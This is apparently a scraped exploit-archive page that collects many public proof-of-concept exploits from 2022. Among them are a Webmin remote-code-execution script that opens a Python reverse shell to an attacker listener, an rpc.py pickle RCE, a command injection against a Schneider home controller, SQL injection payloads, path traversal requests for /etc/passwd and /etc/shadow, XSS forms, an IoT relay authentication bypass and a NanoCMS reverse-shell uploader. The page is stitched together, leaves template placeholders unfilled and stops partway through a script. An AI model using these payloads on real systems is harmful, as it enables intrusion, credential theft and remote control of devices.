mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:65534:65534:nobody:/home:/bin/false guest:x:502:101::/home/guest:/bin/bash carel:x:500:500:Carel:/home/carel:/bin/bash http:x:48:48:HTTP users:/usr/local/www/http:/bin/false httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash sshd:x:1000:1001:SSH drop priv user:/:/bin/false
HireHackking
# Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS) # Date: 21/07/2022 # Exploit Author: Steffin Stanly # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://wordpress.org/plugins/wp-useronline/ # Version: <=2.87.6 # Tested on Windows How to reproduce vulnerability: 1. Install WordPress 6.0.1 2. Install and activate WP-UserOnline plugin. 3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site. 4. Add the following payload "><script>alert(1)</script> and save changes 5. On visiting the dashboard, You will observe that the payload successfully got stored in the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking

Wavlink WN533A8 - Password Disclosure

HACKER · %s · %s

# Exploit Title: Wavlink WN533A8 - Password Disclosure # Date: 2022-06-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34046 # Tested on: Windows # Exploit view-source:http://IP_ADDRESS/sysinit.shtml search for var syspasswd=" you will find the username and the password
HireHackking
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download # Google Dork: N/A # Date: 07.27.2022 # Exploit Author: SecuriTrust # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: < 1.4.7 # Tested on: Linux, Windows # CVE : CVE-2022-2551 # Reference: https://securitrust.fr # Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551 #Product: WordPress Plugin Duplicator < 1.4.7 #Vulnerability: 1-It allows an attacker to download the backup file. #Proof-Of-Concept: 1-Backup download. The backup file can be downloaded using the "is_daws" parameter. http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
HireHackking

CuteEditor for PHP 6.6 - Directory Traversal

HACKER · %s · %s

# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal # Google Dork: N/A # Date: November 17th, 2021 # Exploit Author: Stefan Hesselman # Vendor Homepage: http://phphtmledit.com/ # Software Link: http://phphtmledit.com/download/phphtmledit.zip # Version: 6.6 # Tested on: Windows Server 2019 # CVE : N/A There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root. File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121 Vulnerable code: [SNIP] function ServerMapPath($input_path,$absolute_path,$virtual_path) { if($absolute_path!="") { return $absolute_path.str_ireplace($virtual_path,"",$input_path); } else { if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN')) { if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF']))); } if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF']))); } return $_SERVER["DOCUMENT_ROOT"].$input_path; } else { return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; } } } [SNIP] ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file. File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56 Vulnerable function (renamefile, line 57): [SNIP] switch ($action) { [SNIP] case "renamefile": rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath)); print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>"; break; [SNIP] $input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes: C:\Inetpub\wwwroot\..\..\..\poc.html Final result: writes poc.html to the webroot. STEPS: 1. Create a poc.html file (XSS PoC will do). <HTML> <title>Path Traversal PoC</title> <BODY> <h1>PoC</h1> <script>alert('directory traversal');</script> </BODY> </HTML> 2. Upload poc.html via the "Insert Templates" page using the "Upload files" option. 3. Select poc.html and select "Rename File". 4. Click on the pencil icon to the right of the poc.html file. 5. Rename file to "..\..\..\poc.html". 6. Press OK. poc.html is written three directories up. This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.
HireHackking

Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-25 # Exploit Author: Emir Polat # Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 # Vendor Homepage: https://www.webmin.com/ # Software Link: https://www.webmin.com/download.html # Version: < 1.997 # Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) # CVE: CVE-2022-36446 import argparse import requests from bs4 import BeautifulSoup def login(args): global session global sysUser session = requests.Session() loginUrl = f"{args.target}:10000/session_login.cgi" infoUrl = f"{args.target}:10000/sysinfo.cgi" username = args.username password = args.password data = {'user': username, 'pass': password} login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'}) sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']}) bs = BeautifulSoup(sysInfo.text, 'html.parser') sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs] if sysUser: return True else: return False def exploit(args): payload = f""" 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'); """ updateUrl = f"{args.target}:10000/package-updates" exploitUrl = f"{args.target}:10000/package-updates/update.cgi" exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'} if login(args): print("[+] Successfully Logged In !") print(f"[+] Session Cookie => sid={session.cookies['sid']}") print(f"[+] User Found => {sysUser[0]}") res = session.get(updateUrl) bs = BeautifulSoup(res.text, 'html.parser') updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs] if updateAccess[0] == "package-updates": print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>") print(f"[+] Exploit starting ... ") print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}") session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'}) session.post(exploitUrl, data=exploitData) else: print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>") else: print("[-] Login Failed !") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)") parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True) parser.add_argument('-u', '--username', help='Username For Login', required=True) parser.add_argument('-p', '--password', help='Password For Login', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False) args = parser.parse_args() exploit(args)
HireHackking

Omnia MPX 1.5.0+r1 - Path Traversal

HACKER · %s · %s

# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal # Date: 24/7/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.telosalliance.com/ # Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions # Version: 1.5.0+r1 # Tested on: MacOS # PoC: http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow User Database: http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
HireHackking

uftpd 2.10 - Directory Traversal (Authenticated)

HACKER · %s · %s

# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated) # Google Dork: N/A # Exploit Author: Aaron Esau (arinerron) # Vendor Homepage: https://github.com/troglobit/uftpd # Software Link: https://github.com/troglobit/uftpd # Version: 2.7 to 2.10 # Tested on: Linux # CVE : CVE-2020-20277 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277 # Reference: https://arinerron.com/blog/posts/6 #Product: uftpd 2.7 to 2.10 #Proof-Of-Concept: 1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication. #Steps 1-Setup nc listener on attacking machine on TCP port 1258 nc -lnvp 1258 2-Login to the FTP service 3-List files ftp> ls ../../../ 3-Set attacker's IP address and retrieve files PORT 127,0,0,1,1,1002 RETR ../../../etc/passwd
HireHackking

WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi

HACKER · %s · %s

# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi # Author: nu11secur1ty # Date: 07.11.2022 # Vendor: https://wphive.com/ # Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9 # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin ## Description: The parameter `idx` from the Visual Slide Box Builder plugin app for WordPress appears to be vulnerable to SQLi. The attacker can receive all database information from the WordPress database and he can use it for very malicious purposes. [+] Payloads: ```mysql --- Parameter: idx (GET) Type: boolean-based blind Title: HAVING boolean-based blind - WHERE, GROUP BY clause Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) HAVING 1854=1854 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL) Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL# --- ```
HireHackking

rpc.py 0.6.0 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 2022-07-12 # Exploit Author: Elias Hohl # Vendor Homepage: https://github.com/abersheeran # Software Link: https://github.com/abersheeran/rpc.py # Version: v0.4.2 - v0.6.0 # Tested on: Debian 11, Ubuntu 20.04 # CVE : CVE-2022-35411 import requests import pickle # Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py HOST =3D "127.0.0.1:65432" URL =3D f"http://{HOST}/sayhi" HEADERS =3D { "serializer": "pickle" } def generate_payload(cmd): class PickleRce(object): def __reduce__(self): import os return os.system, (cmd,) payload =3D pickle.dumps(PickleRce()) print(payload) return payload def exec_command(cmd): payload =3D generate_payload(cmd) requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) def main(): exec_command('curl http://127.0.0.1:4321') # exec_command('uname -a') if __name__ =3D=3D "__main__": main()
HireHackking

Dingtian-DT-R002 3.1.276A - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass # Google Dork: NA # Date: 13th July 2022 # Exploit Author: Victor Hanna (Trustwave SpiderLabs) # Author Github Page: https://9lyph.github.io/CVE-2022-29593/ # Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html # Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download # Version: V3.1.276A # Tested on: MAC OSX # CVE : CVE-2022-29593#!/usr/local/bin/python3 # Author: Victor Hanna (SpiderLabs) # DingTian DT-R002 2CH Smart Relay # CWE-294 - Authentication Bypass by Capture-replay import requests import re import urllib.parse from colorama import init from colorama import Fore, Back, Style import sys import os import time from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def banner(): print ("[+]********************************************************************************[+]") print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |") print ("| Description: DingTian DT-R002 2CH Smart Relay |") print ("| Usage : "+sys.argv[0]+" <host> <relay#> |") print ("[+]********************************************************************************[+]") def main(): os.system('clear') banner() urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&" urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&" urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&" urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&" headers = { "Host": ""+host+"", "User-Agent": "9lyph/3.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": "http://"+host+"/relay_cgi.html", "Cookie": "session=4463009" } print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ") for i in range(5): time.sleep (1) print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="") try: if (relay == "1"): print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay1On) time.sleep (5) print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL) r = requests.get(urlRelay1Off) print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="") elif (relay == "2"): print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay2On) time.sleep (5) print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay2Off) print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="") else: print (Fore.RED + "[!] No such relay" + Style.RESET_ALL) except KeyboardInterrupt: sys.exit(1) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except Exception as e: print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL) if __name__ == "__main__": if len(sys.argv)>2: host = sys.argv[1] relay = sys.argv[2] main () else: print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)
HireHackking
# Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution # Exploit Author: LiquidWorm <#SpaceLogic.ps1 Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit Vendor: Schneider Electric SE Product web page: https://www.se.com https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/ https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware Affected version: SpaceLogic C-Bus Home Controller (5200WHC2) formerly known as C-Bus Wiser Home Controller MK2 V1.31.460 and prior Firmware: 604 Summary: SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants. Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems... you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide! The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains. Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls. Desc: The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam. ========================================================= /www/delsnap.pl: ---------------- 01: #!/usr/bin/perl 02: use IO::Handle; 03: 04: 05: select(STDERR); 06: $| = 1; 07: select(STDOUT); 08: $| = 1; 09: 10: #print "\r\n\r\n"; 11: 12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/'; 13: use CGI; 14: 15: my $PROGNAME = "delsnap.pl"; 16: 17: my $cgi = new CGI(); 18: 19: my $name = $cgi->param('name'); 20: if ($name eq "list") { 21: print "\r\n\r\n"; 22: print "DATA="; 23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`; 24: exit(0); 25: } 26: if ($name eq "deleteall") { 27: print "\r\n\r\n"; 28: print "DELETINGALL=TRUE&"; 29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`; 30: print "COMPLETED=true\n"; 31: exit(0); 32: } 33: #print "name $name\n"; 34: print "\r\n\r\n"; 35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name"; 36: 37: unlink $filename or die "COMPLETED=false\n"; 38: 39: print "COMPLETED=true\n"; ========================================================= Tested on: Machine: OMAP3 Wiser2 Board CPU: ARMv7 revision 2 GNU/Linux 2.6.37 (armv7l) BusyBox v1.22.1 thttpd/2.25b Perl v5.20.0 Clipsal 81 Angstrom 2009.X-stable PICED 4.14.0.100 lighttpd/1.7 GCC 4.4.3 NodeJS v10.15.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5710 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf CVE ID: CVE-2022-34753 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753 27.03.2022 #> $host.UI.RawUI.ForegroundColor = "Green" if ($($args.Count) -ne 2) { Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n") } else { $ip = $args[0] $cmd = $args[1] $cmdinj = "/delsnap.pl?name=|$cmd" Write-Host("`nSending command '$cmd' to $ip`n") #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj curl -v $ip$cmdinj } <#PoC PS C:\> .\SpaceLogic.ps1 Usage: .\SpaceLogic.ps1 [IP] [CMD] PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd" Sending command 'uname -a;id;pwd' to 192.168.1.2 VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload VERBOSE: received 129-byte response of content type text/html; charset=utf-8 StatusCode : 200 StatusDescription : OK Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux uid=0(root) gid=0(root) /custom-package RawContent : HTTP/1.1 200 OK Access-Control-Allow-Origin: * Connection: keep-alive Content-Length: 129 Content-Type: text/html; charset=utf-8 Date: Thu, 30 Jun 2022 14:48:43 GMT ETag: W/"81-LTIWJvYlDBYAlgXEy... Forms : {} Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; charset=utf-8]...} Images : {} InputFields : {} Links : {} ParsedHtml : mshtml.HTMLDocumentClass RawContentLength : 129 PS C:\> #>
HireHackking

Wavlink WN533A8 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS) # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34048 # Tested on: Windows # Poc code <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"> <input type="hidden" name="newUI" value="1" /> <input type="hidden" name="page" value="login" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="langChange" value="0" /> <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" /> <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" /> <input type="hidden" name="homepage" value="main&#46;shtml" /> <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" /> <input type="hidden" name="wizardpage" value="wiz&#46;shtml" /> <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" /> <input type="hidden" name="key" value="M94947765" /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /> <input type="hidden" name="lang&#95;select" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking

WordPress Plugin Duplicator 1.4.7 - Information Disclosure

HACKER · %s · %s

# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure # Google Dork: N/A # Date: 07.27.2022 # Exploit Author: SecuriTrust # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: <= 1.4.7 # Tested on: Linux, Windows # CVE : CVE-2022-2552 # Reference: https://securitrust.fr # Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552 #Product: WordPress Plugin Duplicator <= 1.4.7 #Vulnerability: 1-Some system information may be disclosure. #Proof-Of-Concept: 1-System information. Some system information is obtained using the "view" parameter. http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
HireHackking

Wavlink WN530HG4 - Password Disclosure

HACKER · %s · %s

# Exploit Title: Wavlink WN530HG4 - Password Disclosure # Date: 2022-06-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M30HG4.V5030.191116 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34047 # Tested on: Windows # Exploit view-source:http://IP_address/set_safety.shtml?r=52300 search for var syspasswd=" you will find the username and the password
HireHackking

mPDF 7.0 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: mPDF 7.0 - Local File Inclusion # Google Dork: N/A # Date: 2022-07-23 # Exploit Author: Musyoka Ian # Vendor Homepage: https://mpdf.github.io/ # Software Link: https://mpdf.github.io/ # Version: CuteNews # Tested on: Ubuntu 20.04, mPDF 7.0.x # CVE: N/A #!/usr/bin/env python3 from urllib.parse import quote from cmd import Cmd from base64 import b64encode class Terminal(Cmd): prompt = "\nFile >> " def default(self, args): payload_gen(args) def banner(): banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __| | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__| | | |_| """ print(banner) def payload_gen(fname): payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />' encoded_payload = quote(payload) print("[+] Replace the content with the payload below") print(f"Url encoded payload:\n{encoded_payload}\n") base64enc = b64encode(encoded_payload.encode()) print(f"Base64 encoded payload:\n{base64enc.decode()}\n") if __name__ == ("__main__"): banner() print("Enter Filename eg. /etc/passwd") terminal= Terminal() terminal.cmdloop()
HireHackking

NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-26 # Exploit Auuthor: p1ckzi # Vendor Homepage: https://github.com/kalyan02/NanoCMS # Version: NanoCMS v0.4 # Tested on: Linux Mint 20.3 # CVE: N/A # # Description: # this script uploads a php reverse shell to the target. # NanoCMS does not sanitise the data of an authenticated user while creating # webpages. pages are saved with .php extensions by default, allowing an # authenticated attacker access to the underlying system: # https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt #!/usr/bin/env python3 import argparse import bs4 import errno import re import requests import secrets import sys def arguments(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=f"{sys.argv[0]} exploits authenticated file upload" "\nand remote code execution in NanoCMS v0.4", epilog=f"examples:" f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php" f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a" f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'" ) parser.add_argument( "address", help="schema/ip/hostname, port, sub-directories" " to the vulnerable NanoCMS server" ) parser.add_argument( "file", help="php file to upload" ) parser.add_argument( "-u", "--user", help="username", default="admin" ) parser.add_argument( "-p", "--passwd", help="password", default="demo" ) parser.add_argument( "-e", "--execute", help="attempts to make a request to the uploaded" " file (more useful if uploading a reverse shell)", action="store_true", default=False ) parser.add_argument( "-a", "--accessible", help="turns off features" " which may negatively affect screen readers", action="store_true", default=False ) parser.add_argument( "-n", "--no-colour", help="removes colour output", action="store_true", default=False ) arguments.option = parser.parse_args() # settings for terminal output defined by user in term_settings(). class settings(): # colours. c0 = "" c1 = "" c2 = "" # information boxes. i1 = "" i2 = "" i3 = "" i4 = "" # checks for terminal setting flags supplied by arguments(). def term_settings(): if arguments.option.accessible: small_banner() elif arguments.option.no_colour: settings.i1 = "[+] " settings.i2 = "[!] " settings.i3 = "[i] " settings.i4 = "$ " banner() elif not arguments.option.accessible or arguments.option.no_colour: settings.c0 = "\u001b[0m" # reset. settings.c1 = "\u001b[38;5;1m" # red. settings.c2 = "\u001b[38;5;2m" # green. settings.i1 = "[+] " settings.i2 = "[!] " settings.i3 = "[i] " settings.i4 = "$ " banner() else: print("something went horribly wrong!") sys.exit() # default terminal banner (looks prettier when run lol) def banner(): print( "\n .__ .__" " .__ " "\n ____ _____ ____ ____ ____ _____ _____| |__ ____ | " "| | | " "\n / \\__ \\ / \\ / _ \\_/ ___\\ / \\ / ___/ | \\_/ " "__ \\| | | | " "\n| | \\/ __ \\| | ( <_> ) \\___| Y Y \\___ \\| Y \\ _" "__/| |_| |__" "\n|___| (____ /___| /\\____/ \\___ >__|_| /____ >___| /\\___ " ">____/____/" "\n \\/ \\/ \\/ \\/ \\/ \\/ \\/ " " \\/" ) def small_banner(): print( f"{sys.argv[0]}" "\nNanoCMS authenticated file upload and rce..." ) # appends a '/' if not supplied at the end of the address. def address_check(address): check = re.search('/$', address) if check is not None: print('') else: arguments.option.address += "/" # creates a new filename for each upload. # errors occur if the filename is the same as a previously uploaded one. def random_filename(): random_filename.name = secrets.token_hex(4) # note: after a successful login, credentials are saved, so further reuse # of the script will most likely not require correct credentials. def login(address, user, passwd): post_header = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) " "Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml," "application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "", "Connection": "close", "Referer": f"{arguments.option.address}data/nanoadmin.php", "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5", "Upgrade-Insecure-Requests": "1", } post_data = { "user": f"{user}", "pass": f"{passwd}" } url_request = requests.post( address + 'data/nanoadmin.php?', headers=post_header, data=post_data, verify=False, timeout=30 ) signin_error = url_request.text if 'Error : wrong Username or Password' in signin_error: print( f"{settings.c1}{settings.i2}could " f"sign in with {arguments.option.user}/" f"{arguments.option.passwd}.{settings.c0}" ) sys.exit(1) else: print( f"{settings.c2}{settings.i1}logged in successfully." f"{settings.c0}" ) def exploit(address, file, name): with open(arguments.option.file, 'r') as file: file_contents = file.read().rstrip() post_header = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) " "Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml," "application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "", "Connection": "close", "Referer": f"{arguments.option.address}data/nanoadmin.php?action=" "addpage", "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5", 